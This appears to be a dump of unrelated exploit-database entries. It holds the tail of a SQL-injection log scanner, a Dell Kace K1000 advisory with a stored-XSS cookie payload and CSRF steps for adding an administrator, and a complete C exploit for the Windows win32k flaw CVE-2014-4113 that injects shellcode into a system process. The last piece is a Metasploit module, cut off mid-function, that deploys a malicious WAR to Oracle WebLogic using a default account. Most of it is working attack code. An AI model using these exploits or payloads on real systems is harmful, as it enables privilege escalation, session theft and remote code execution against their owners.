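                  and seen["bool-true"] != seen["bool-false"])


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print("line %(line)d %(path)s %(param)s=%(value)r -> %(kind)s "
              "(HTTP %(status)d, %(size)d bytes)" % h)
    print("confirmed boolean-blind:", confirmed_boolean_probes(hits))
```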

=========================================================================================================================================================
3. Stored Cross Site Scripting (XSS) Vulnerability (CVE-2018-5405)
=========================================================================================================================================================

The Dell Kace K1000 fails to sanitize user input when creating a ticket. A least-privileged user with 'User Console Only' rights could exploit this vulnerability to inject arbitrary JavaScript while creating tickets; the script is executed when administrators or any other user view these tickets.
An authenticated least-privileged user with 'User Console Only' rights can thus inject arbitrary JavaScript code into the tickets page, and this script executes every time a user visits the page. This allows a malicious user of the system to steal the session cookies of other users, including the Administrator, and take over their sessions. This can be used to launch further attacks.

#Proof-Of-Concept:
------------------
1. Log into the Dell Kace K1000 web interface as a least privileged user.
2. Navigate to Service Desk-->Tickets and create a new ticket.
3. Inject the following payload into the Summary field:
	
	Test Ticket</textarea></div></div><script>alert("XSSinSummary");alert(document.cookie);</script><!--

4. Save the ticket.
5. Go back to Tickets and view the newly created ticket; a couple of alert boxes should pop up.
6. Any user, including an administrator, who visits this ticket page executes the injected script.


=========================================================================================================================================================
4. Misconfigured CORS Vulnerability (CVE-2018-5406)
=========================================================================================================================================================

The Dell Kace K1000 fails to implement Cross-Origin Resource Sharing (CORS) properly, which leads to a Cross-Site Request Forgery (CSRF) attack.

An unauthenticated, remote attacker could exploit this vulnerability to perform sensitive actions such as adding a new administrator account or changing the appliance's settings. Likewise, a malicious internal user of the organization could induce an administrator of the appliance to visit a malicious link that exploits this vulnerability to perform the same sensitive actions.


#Proof-Of-Concept:
------------------
1. Try to create a new user and capture the request in BurpSuite to create a CSRF PoC from there. Create an HTML form and put it under the web root of your Kali machine.
2. Log into the web interface of the appliance as admin.
3. Open a new tab in the same browser and access the HTML page from step 1.
4. Save the ticket.
5. Submit the request (this can be modified to submit the request automatically).
6. Check BurpSuite to see whether the request to add the user 'Hacker' was sent to the appliance and whether it originated from your Kali machine.
7. Check the admin console to see whether the user 'Hacker' has been added.

===================================
#Vulnerability Disclosure Timeline:
===================================

04/2018: Submitted report to CERT-US.
04/2018: CERT-US reported the issue to vendor.
05/2018: Awaiting vendor response.
10/2018: Vendor asked us to test the patch, as they had already fixed these issues.
10/2018: Confirmed that all the vulnerabilities except Vulnerability #2 are fixed in 9.0.270; Vulnerability #2 still exists in the other patched versions.
01/2019: Vendor confirmed that they were working on fixing all of the vulnerabilities, would release a patch on May 01 2019, and asked us to publish this on June 01 2019 so that customers have enough time to patch.
05/2019: Vendor published an advisory.
06/2019: CERT-US published a Vulnerability Note, VU#877837.
            
#include "hd.h"

// EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46945.rar


byte __s_code[]={
	0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 ,
	0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 ,
	0x4C ,0x89 ,0x70 ,0x10 ,0x90 ,0x65 ,0x48 ,0x8B ,0x04 ,0x25 ,0x30 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8B ,
	0x40 ,0x60 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x8B ,0x78 ,0x18 ,0x48 ,0x8B ,0x47 ,0x10 ,0x48 ,0x83 ,
	0xC7 ,0x10 ,0x48 ,0x3B ,0xC7 ,0x0F ,0x84 ,0x99 ,0x01 ,0x00 ,0x00 ,0x48 ,0xBB ,0x65 ,0x00 ,0x6C ,
	0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x48 ,0xBE ,0x2E ,0x00 ,0x64 ,0x00 ,0x6C ,0x00 ,0x6C ,0x00 ,0x49 ,
	0xBA ,0x6B ,0x00 ,0x65 ,0x00 ,0x72 ,0x00 ,0x6E ,0x00 ,0x48 ,0xBD ,0x4B ,0x00 ,0x45 ,0x00 ,0x52 ,
	0x00 ,0x4E ,0x00 ,0x49 ,0xB8 ,0x45 ,0x00 ,0x4C ,0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x49 ,0xB9 ,0x2E ,
	0x00 ,0x44 ,0x00 ,0x4C ,0x00 ,0x4C ,0x00 ,0x66 ,0x0F ,0x1F ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,
	0x66 ,0x83 ,0x78 ,0x58 ,0x18 ,0x48 ,0x8B ,0x48 ,0x60 ,0x72 ,0x25 ,0x48 ,0x8B ,0x11 ,0x49 ,0x3B ,
	0xD2 ,0x75 ,0x0C ,0x48 ,0x39 ,0x59 ,0x08 ,0x75 ,0x06 ,0x48 ,0x39 ,0x71 ,0x10 ,0x74 ,0x1E ,0x48 ,
	0x3B ,0xD5 ,0x75 ,0x0C ,0x4C ,0x39 ,0x41 ,0x08 ,0x75 ,0x06 ,0x4C ,0x39 ,0x49 ,0x10 ,0x74 ,0x0D ,
	0x48 ,0x8B ,0x00 ,0x48 ,0x3B ,0xC7 ,0x75 ,0xC8 ,0xE9 ,0x17 ,0x01 ,0x00 ,0x00 ,0x48 ,0x8B ,0x78 ,
	0x30 ,0x48 ,0x85 ,0xFF ,0x0F ,0x84 ,0x0A ,0x01 ,0x00 ,0x00 ,0x48 ,0x63 ,0x47 ,0x3C ,0xB9 ,0x4D ,
	0x5A ,0x00 ,0x00 ,0x66 ,0x39 ,0x0F ,0x0F ,0x85 ,0xF8 ,0x00 ,0x00 ,0x00 ,0x81 ,0x3C ,0x38 ,0x50 ,
	0x45 ,0x00 ,0x00 ,0x0F ,0x85 ,0xEB ,0x00 ,0x00 ,0x00 ,0x44 ,0x8B ,0x8C ,0x38 ,0x88 ,0x00 ,0x00 ,
	0x00 ,0x49 ,0x8B ,0xD6 ,0x4C ,0x03 ,0xCF ,0x45 ,0x8B ,0x41 ,0x20 ,0x41 ,0x8B ,0x49 ,0x18 ,0x4C ,
	0x03 ,0xC7 ,0x48 ,0x85 ,0xC9 ,0x74 ,0x32 ,0x48 ,0xBB ,0x43 ,0x72 ,0x65 ,0x61 ,0x74 ,0x65 ,0x50 ,
	0x72 ,0x49 ,0xBA ,0x72 ,0x6F ,0x63 ,0x65 ,0x73 ,0x73 ,0x41 ,0x00 ,0x0F ,0x1F ,0x44 ,0x00 ,0x00 ,
	0x41 ,0x8B ,0x04 ,0x90 ,0x48 ,0x39 ,0x1C ,0x38 ,0x75 ,0x07 ,0x4C ,0x39 ,0x54 ,0x38 ,0x07 ,0x74 ,
	0x08 ,0x48 ,0xFF ,0xC2 ,0x48 ,0x3B ,0xD1 ,0x72 ,0xE7 ,0x33 ,0xC0 ,0x48 ,0x3B ,0xD1 ,0x0F ,0x83 ,
	0x92 ,0x00 ,0x00 ,0x00 ,0x41 ,0x8B ,0x49 ,0x24 ,0x45 ,0x33 ,0xC0 ,0x48 ,0x03 ,0xCF ,0x0F ,0xB7 ,
	0x14 ,0x51 ,0x41 ,0x8B ,0x49 ,0x1C ,0x45 ,0x33 ,0xC9 ,0x48 ,0x03 ,0xCF ,0x44 ,0x8B ,0x14 ,0x91 ,
	0x48 ,0x89 ,0x44 ,0x24 ,0x58 ,0x48 ,0x89 ,0x44 ,0x24 ,0x60 ,0x4C ,0x03 ,0xD7 ,0x48 ,0x8D ,0x7C ,
	0x24 ,0x70 ,0xB9 ,0x68 ,0x00 ,0x00 ,0x00 ,0xF3 ,0xAA ,0xB8 ,0x05 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B ,
	0xD3 ,0x66 ,0x89 ,0x84 ,0x24 ,0xB0 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8D ,0x44 ,0x24 ,0x50 ,0x33 ,0xC9 ,
	0x48 ,0x89 ,0x44 ,0x24 ,0x48 ,0x48 ,0x8D ,0x44 ,0x24 ,0x70 ,0x4C ,0x89 ,0x74 ,0x24 ,0x50 ,0x48 ,
	0x89 ,0x44 ,0x24 ,0x40 ,0x4C ,0x89 ,0x74 ,0x24 ,0x38 ,0x4C ,0x89 ,0x74 ,0x24 ,0x30 ,0xC7 ,0x44 ,
	0x24 ,0x28 ,0x10 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x70 ,0x68 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x84 ,
	0x24 ,0xAC ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x20 ,0x01 ,0x00 ,0x00 ,
	0x00 ,0x41 ,0xFF ,0xD2 ,0x33 ,0xC0 ,0x4C ,0x8D ,0x9C ,0x24 ,0xE0 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B ,
	0x5B ,0x20 ,0x49 ,0x8B ,0x6B ,0x38 ,0x49 ,0x8B ,0xE3 ,0x41 ,0x5E ,0x5F ,0x5E ,0xC3
};




HMENU __init_menu(
	)
{
	HMENU hMenu_Ret=NULL;
	MENUITEMINFO mItem={0};

	do 
	{
		HMENU hme=CreatePopupMenu();
		if (hme==NULL){
			printf("CreatePopupMenu()_1 fail:0x%x\n" ,GetLastError());
			break;
		}

		mItem.cbSize=sizeof(MENUITEMINFO);
		mItem.fMask=(MIIM_STRING);

		bool bisok=InsertMenuItem(hme ,0 ,1 ,&mItem);
		if (bisok==false){
			printf("InsertMenuItem()_1 fail:0x%x\n" ,GetLastError());
			break;
		}

		hMenu_Ret=CreatePopupMenu();
		if (hMenu_Ret==NULL){
			printf("CreatePopupMenu()_2 fail:0x%x\n" ,GetLastError());
			break;
		}

		MENUITEMINFO mi={0};
		mi.cbSize=sizeof(mi);
		mi.fMask=(MIIM_STRING|MIIM_SUBMENU);
		mi.hSubMenu=hme;
		mi.dwTypeData="";
		mi.cch=1;

		bisok=InsertMenuItem(hMenu_Ret ,0 ,1 ,&mi);
		if (bisok==false){
			printf("InsertMenuItem()_2 fail: 0x%x\n" ,GetLastError());
		}

	} while (false);

	return hMenu_Ret;
}


PVOID __calc_sep_token_addr(
	)
{
	NTSTATUS status;
	PSYSTEM_HANDLE_INFORMATION handleInfo=NULL;
	ULONGLONG handleInfoSize = 0x10000 ,i ,ret_obj_addr=NULL; 

	do 
	{
		_NtQuerySystemInformation NtQuerySystemInformation = 
			(_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation");

		_NtDuplicateObject NtDuplicateObject =
			(_NtDuplicateObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtDuplicateObject");

		_NtQueryObject NtQueryObject =
			(_NtQueryObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQueryObject");


		if (!NtQuerySystemInformation || !NtDuplicateObject || !NtQueryObject){
			printf("get sys proc failed!\n");
			break;
		}

		handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);

		while ((status = NtQuerySystemInformation(SystemHandleInformation,handleInfo,
			handleInfoSize,NULL)) == STATUS_INFO_LENGTH_MISMATCH)
			handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);

		if (!NT_SUCCESS(status)){
			printf("NtQuerySystemInformation failed!\n");
			break;
		}


		POBJECT_TYPE_INFORMATION objectTypeInfo=(POBJECT_TYPE_INFORMATION)malloc(0x1000);

		for (i = 0; i < handleInfo->HandleCount; i++)
		{
			SYSTEM_HANDLE handle = handleInfo->Handles[i];

			if (handle.ProcessId != GetCurrentProcessId())
				continue;

			if (!NT_SUCCESS(NtQueryObject(
				(HANDLE)handle.Handle,
				ObjectTypeInformation,
				objectTypeInfo,
				0x1000,
				NULL
				)))
			{
				printf("[%#x] Error!\n", handle.Handle);
				continue;
			}

			if (objectTypeInfo->Name.Buffer==NULL || objectTypeInfo->Name.Length==0)
				continue;

			if (wcscmp(objectTypeInfo->Name.Buffer ,L"Token"))
				continue;

			ret_obj_addr=((ULONGLONG)handle.Object+0x40);
		}

		if (objectTypeInfo)
			free(objectTypeInfo);

		if (handleInfo)
			free(handleInfo);

	} while (false);

	return (PVOID)ret_obj_addr;
}


ULONGLONG __calc_pid(
	)
{
	NTSTATUS status;
	PSYSTEM_PROCESS_INFORMATION PsInfo=NULL;
	ULONGLONG PsInfoSize = 0x10000 ,ret_pid=NULL; 

	do 
	{
		_NtQuerySystemInformation NtQuerySystemInformation = 
			(_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation");


		if (!NtQuerySystemInformation){
			printf("get sys proc failed!\n");
			break;
		}

		PsInfo = (PSYSTEM_PROCESS_INFORMATION)malloc(PsInfoSize);

		while ((status = NtQuerySystemInformation(SystemProcessesAndThreadsInformation,PsInfo,
			PsInfoSize ,NULL)) == STATUS_INFO_LENGTH_MISMATCH)
			PsInfo = (PSYSTEM_PROCESS_INFORMATION)realloc(PsInfo, PsInfoSize*= 2);

		if (!NT_SUCCESS(status)){
			printf("NtQuerySystemInformation failed!\n");
			break; 
		}

		for (;PsInfo->NextEntryDelta ;PsInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONGLONG)PsInfo + PsInfo->NextEntryDelta))
		{
			if (PsInfo->ProcessName.Buffer==NULL || PsInfo->ProcessName.Length==0)
				continue;

			if (!wcscmp(PsInfo->ProcessName.Buffer ,L"winlogon.exe")){
				ret_pid=PsInfo->InheritedFromProcessId;
				break;
			}
		}

	} while (false);

	return ret_pid;
} 


ULONGLONG __init_fake_wnd_pti(
	)
{
	ULONGLONG ret_pti=NULL;
	ULONGLONG dst_proc_addr=NULL;

	do 
	{
		ret_pti=(ULONGLONG)malloc(0x500);
		if (ret_pti==NULL){
			printf("malloc fail!\n");
			return NULL; 
		}

		*(ULONGLONG*)(ret_pti+_oft_win32ps_pti)=0;  //Win32Process
		*(DWORD*)(ret_pti+_oft_0420h_pti)=0;		//not 0x20
		*(ULONGLONG*)(ret_pti+_oft_list_header_pti)=(ULONGLONG)__calc_sep_token_addr()-0x5;  //TODO:

		void* tmpbuf=malloc(0x100); 
		memset(tmpbuf ,0 ,0x100);
		*(ULONGLONG*)(ret_pti+_oft_0188h_pti)=(ULONGLONG)tmpbuf; //buf addr(size >= 0x12) ,check in win32k!SetWakeBit

	} while (false);

	return ret_pti;
}



bool __init_fake_tagWnd(
	)
{
	bool bRet=false;
	_ZwAllocateVirtualMemory_pt pfn_ZwAllocateVm=NULL;

	do 
	{
		HMODULE hmd=LoadLibrary("ntdll.dll");
		if (hmd==NULL)
			break;

		ULONGLONG fake_tagwnd_pti=__init_fake_wnd_pti();
		if (fake_tagwnd_pti==NULL){
			printf("__init_fake_wnd_pti() fail!\n");
			break;
		}


		pfn_ZwAllocateVm=(_ZwAllocateVirtualMemory_pt)GetProcAddress(hmd ,"ZwAllocateVirtualMemory");
		if (pfn_ZwAllocateVm==NULL){
			printf("pfn ZwAllocateVirtualMemory addr is NULL!\n");
			break;
		}

		BYTE* fake_tagWnd_addr=(BYTE*)0xFFFFFFFB; size_t region_size=0x20000;
		NTSTATUS status=pfn_ZwAllocateVm(GetCurrentProcess() ,(PVOID*)&fake_tagWnd_addr ,0 ,&region_size,
			MEM_RESERVE | MEM_COMMIT|MEM_TOP_DOWN ,PAGE_EXECUTE_READWRITE);

		if (status < 0){
			printf("Allocate fake tagWnd fail!\n");
			break;
		}

		ULONGLONG ul_align=0xFFFFFFFBLL-(ULONGLONG)fake_tagWnd_addr;
		if (ul_align > 0x10000){
			printf("alloc fake fail: %x!\n" ,fake_tagWnd_addr);
			break;
		}

		memset(fake_tagWnd_addr+ul_align ,0 ,0x1000);

		*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_idx_tagWND)=0x0;
		*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_pti_tagWnd)=fake_tagwnd_pti; //oft 0x170 == win32process
		*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_18h_tagWnd)=0x0; //0 ,check in IsWindowDesktopComposed

		bRet=true;

	} while (false);

	return bRet;
}



LRESULT __stdcall __wh_wnd_proc( 
	int code, 
	WPARAM wparam,
	LPARAM lparam 
	)
{
	do 
	{
		CWPSTRUCT* lpm=(CWPSTRUCT*)lparam;
		if (lpm->message != MN_FINDWINDOWFROMPOINT || g_bis_mn_findwnded==true)
			break;

		g_bis_mn_findwnded=true;

		UnhookWindowsHook(WH_CALLWNDPROC ,__wh_wnd_proc);

		g_ori_wnd_proc=(WNDPROC)SetWindowLongPtr(lpm->hwnd ,GWLP_WNDPROC ,(LONG_PTR)__wnd_proc_sl);

	} while (false);

	return CallNextHookEx(g_hhk ,code ,wparam ,lparam);
}




LRESULT __wnd_proc_sl( 
	HWND hwnd,
	UINT umsg,
	WPARAM wparam, 
	LPARAM lparam
	)
{
	do 
	{
		if (umsg != MN_FINDWINDOWFROMPOINT )
			break;

		if (g_bis_endmenu)
			break;

		g_bis_endmenu=1;

		EndMenu();
		return 0xFFFFFFFB;

	} while (false);

	return CallWindowProc(g_ori_wnd_proc ,hwnd ,umsg ,wparam ,lparam);
}



LRESULT __stdcall __wnd_proc(
	HWND hwnd, 
	UINT umsg, 
	WPARAM wparam, 
	LPARAM lparam
	)
{
	if (umsg==WM_ENTERIDLE && g_bis_idled==FALSE)
	{
		g_bis_idled=TRUE;
		PostMessage(hwnd ,WM_KEYFIRST ,0x28 ,0);    
		PostMessage(hwnd ,WM_KEYFIRST ,0X27 ,0);   
		PostMessage(hwnd ,WM_LBUTTONDOWN ,0 ,0xff00ff);  
	}

	return DefWindowProc(hwnd ,umsg ,wparam ,lparam);
}


DWORD __stdcall __thread_plroc( 
	void*  param
	)
{
	bool bisok=false;
	WNDCLASS wndcls={0};

	do 
	{
		wndcls.lpfnWndProc=__wnd_proc;
		wndcls.lpszClassName="cve_2014_4113";
		RegisterClass(&wndcls);

		HWND hwnd=CreateWindowEx(0 ,wndcls.lpszClassName ,NULL ,0 ,0 ,0,
			200 ,200 ,NULL ,NULL ,NULL ,NULL);
		if (hwnd==NULL){
			printf("CreateWindowEx() fail: 0x%x\n" ,GetLastError());
			break;
		}

		HMENU hmenu=__init_menu();
		if (hmenu==NULL){
			printf("__init_menu() fail: 0x%x\n" ,GetLastError());
			break;
		}

		
		bool bisok=__init_fake_tagWnd();
		if (bisok==false){
			printf("__init_fake_tagWnd() fail:0x%x\n" ,GetLastError());
			break;
		}
		
		g_hhk=SetWindowsHookEx(WH_CALLWNDPROC ,__wh_wnd_proc ,NULL ,GetCurrentThreadId());
		if (g_hhk==NULL){
			printf("SetWindowsHookEx() fail:0x%x\n" ,GetLastError());
			break;
		}

		bisok=TrackPopupMenu(hmenu ,0 ,0x0FFFFD8F0 ,0x0FFFFD8F0 ,0 ,hwnd ,NULL);
		if (bisok==false){
			printf("TrackPopupMenu() fail:0x%x\n" ,GetLastError());
			break;
		}

		DestroyMenu(hmenu);   // an HMENU is a USER object, not a kernel handle, so CloseHandle() is the wrong call

		DestroyWindow(hwnd);

	} while (FALSE);

	return 0;
}



int main(
	int argc ,char** argv
	)
{
	bool bisok=false;

	do 
	{
		if (argc != 2){
			printf("usage: xxx fpath");
			break;
		}

		HANDLE hProcessToken=NULL ,hRestrictedToken=NULL;
		if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hProcessToken)) {
			printf("Could not open process token\n");
			break; 
		}

		if (!CreateRestrictedToken(hProcessToken, DISABLE_MAX_PRIVILEGE, 0, 0, 0, 0, 0, 0, &hRestrictedToken)){
			printf("Could not create restricted token\n");
			break;
		}

		if (!AdjustTokenPrivileges(hRestrictedToken, TRUE, NULL, 0, NULL, NULL)) {
			printf("Could not adjust privileges\n");
			break;
		}
		
		CloseHandle(hProcessToken);

		HANDLE hthread=CreateThread(NULL ,0 ,__thread_plroc ,NULL ,0 ,NULL);
		if (hthread==NULL){
			printf("CreateThread() fail: 0x%x\n" ,GetLastError());
			break;
		}

		WaitForSingleObject(hthread ,1000);
		TerminateThread(hthread ,0);
		
		if (!ImpersonateLoggedOnUser(hRestrictedToken)){
			printf("ImpersonateLoggedOnUser failed!\n");
			break;
		}
		
		PVOID pfn_cps=GetProcAddress(LoadLibrary("Kernel32.dll") ,"CreateProcessA");
		if (pfn_cps==NULL){
			printf("GetProcess CreateProcessA failed!\n");
			break;
		}
		
		ULONGLONG ul_pid_winlogon=__calc_pid();
		if (ul_pid_winlogon==NULL){
			printf("__calc_pid() failed!\n");
			break;
		}


		HANDLE hprocess=OpenProcess(PROCESS_ALL_ACCESS ,TRUE ,ul_pid_winlogon);
		if (hprocess==NULL){
			printf("OpenProcess failed: %x\n" ,GetLastError());
			break;
		}


		//init params
		PVOID params=VirtualAllocEx(hprocess ,NULL ,strlen(argv[1])+10 ,MEM_COMMIT ,PAGE_READWRITE);
		if (params==NULL){
			printf("VirtualAllocEx failed:%x\n" ,GetLastError());
			break;
		}

		ULONGLONG ul_ret_wrt=0;
		bisok=WriteProcessMemory(hprocess ,params ,argv[1] ,strlen(argv[1])+2 ,(SIZE_T*)&ul_ret_wrt);
		if (bisok==false || ul_ret_wrt < strlen(argv[1])+2){
			printf("WriteProcessMemory() failed!\n");
			break;
		} 


		//init shellcode

		PVOID shellcode=VirtualAllocEx(hprocess ,NULL ,0x220 ,MEM_COMMIT ,PAGE_EXECUTE_READWRITE);
		if (shellcode==NULL){
			printf("VirtualAllocEx failed:%x\n" ,GetLastError());
			break;
		}

		bisok=WriteProcessMemory(hprocess ,shellcode ,__s_code ,sizeof(__s_code) ,(SIZE_T*)&ul_ret_wrt);
		if (bisok==false || ul_ret_wrt < sizeof(__s_code)){
			printf("WriteProcessMemory() failed!\n");
			break;
		}

		DWORD dw_tid=0;
		HANDLE htd_rmt=CreateRemoteThread(hprocess ,NULL ,0 ,(LPTHREAD_START_ROUTINE )shellcode ,params ,0 ,&dw_tid);
		if (htd_rmt==NULL){
			printf("CreateRemoteThread() fail!\n");
			break;
		}


		//clear

		CloseHandle(htd_rmt);

		CloseHandle(hprocess);

		CloseHandle(hRestrictedToken);

	} while (false);
	
	return 0;
}
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',
      'Description'    => %q{
        This module abuses a feature in WebLogic Server's Administration Console to install
        a malicious Java application in order to gain remote code execution. Authentication
        is required; however, by default Oracle ships with an "oats" account that you could
        log in with, which grants you administrator access.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Steven Seeley', # Used the trick and told me about it
          'sinn3r'         # Metasploit module
        ],
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'WebLogic Server Administration Console 12 or prior', { } ]
        ],
      'References'     =>
        [
          # The CVE description matches what this exploit is doing, but it was for version
          # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.
          # ['CVE', '2007-2699']
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 8088
        },
      'Notes'          =>
        {
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 13 2019',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path of the WebLogic administration console', '/']),
        OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),
        OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])
      ])

    register_advanced_options(
      [
        OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
      ])
  end

  class LoginSpec
    attr_accessor :admin_console_session
  end

  def login_spec
    @login_spec ||= LoginSpec.new
  end

  class OatsWarPayload < MetasploitModule
    attr_reader :name
    attr_reader :war

    def initialize(payload)
      @name = [Faker::App.name, Rex::Text.rand_name].sample
      @war = payload.encoded_war(app_name: name).to_s
    end
  end

  def default_oats_path
    datastore['DefaultOatsPath']
  end

  def war_payload
    @war_payload ||= OatsWarPayload.new(payload)
  end

  def set_frsc
    value = get_deploy_frsc
    @frsc = value
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
    })

    if res && res.body.include?('Oracle WebLogic Server Administration Console')
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def set_admin_console_session(res)
    cookie = res.get_cookies
    admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first
    vprint_status("Token for console session is: #{admin_console_session}")
    login_spec.admin_console_session = admin_console_session
  end

  def is_logged_in?(res)
    html = res.get_html_document
    a_element = html.at('a')
    if a_element.respond_to?(:attributes) && a_element.attributes['href']
      link = a_element.attributes['href'].value
      return URI(link).request_uri == '/console'
    end

    false
  end

  def do_login
    uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri
    })

    fail_with(Failure::Unknown, 'No response from server') unless res
    set_admin_console_session(res)

    uri = normalize_uri(target_uri.path, 'console', 'j_security_check')
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => uri,
      'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_post' =>
        {
          'j_username'           => datastore['OATSUSERNAME'],
          'j_password'           => datastore['OATSPASSWORD'],
          'j_character_encoding' => 'UTF-8'
        }
    })

    fail_with(Failure::Unknown, 'No response while trying to log in') unless res
    fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
    store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])
    set_admin_console_session(res)
  end

  def get_deploy_frsc
    # First we are just going through the pages in a specific order to get the FRSC value
    # we need to prepare uploading the WAR file.
    res = nil
    requests =
      [
        { path: 'console/', vars: {} },
        { path: 'console/console.portal', vars: {'_nfpb'=>"true"} },
        { path: 'console/console.portal', vars: {'_nfpb'=>"true", '_pageLabel' => 'HomePage1'} }
      ]

    requests.each do |req|
      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path, req[:path]),
        'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
        'vars_get' => req[:vars]
      })

      fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res
    end

    html = res.get_html_document
    hidden_input = html.at('input[@name="ChangeManagerPortletfrsc"]')
    frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil
    frsc_attr ? frsc_attr.value : ''
  end

  def do_select_upload_action
    action = '/com/bea/console/actions/app/install/selectUploadApp'
    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'    => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get'  =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortletselectedAppPath' => app_path,
          'AppApplicationInstallPortletfrsc' => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
  end

  def do_upload_app_action
    action = '/com/bea/console/actions/app/install/uploadApp'
    ctype = 'application/octet-stream'
    app_cname = 'AppApplicationInstallPortletuploadAppPath'
    plan_cname = 'AppApplicationInstallPortletuploadPlanPath'
    frsc_cname = 'AppApplicationInstallPortletfrsc'
    war = war_payload.war
    war_name = war_payload.name
    post_data = Rex::MIME::Message.new
    post_data.add_part(war, ctype, 'binary', "form-data; name=\"#{app_cname}\"; filename=\"#{war_name}.war\"")
    post_data.add_part('', ctype, nil, "form-data; name=\"#{plan_cname}\"; filename=\"\"")
    post_data.add_part(frsc, nil, nil, "form-data; name=\"#{frsc_cname}\"")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
       'ctype'   => "multipart/form-data; boundary=#{post_data.bound}",
       'data'    => post_data.to_s
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)
  end

  def do_app_select_action
    action = '/com/bea/console/actions/app/install/appSelected'
    war_name = war_payload.name
    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortletselectedAppPath' => app_path,
          'AppApplicationInstallPortletfrsc'            => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)
  end

  def do_style_select_action
    action = '/com/bea/console/actions/app/install/targetStyleSelected'

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
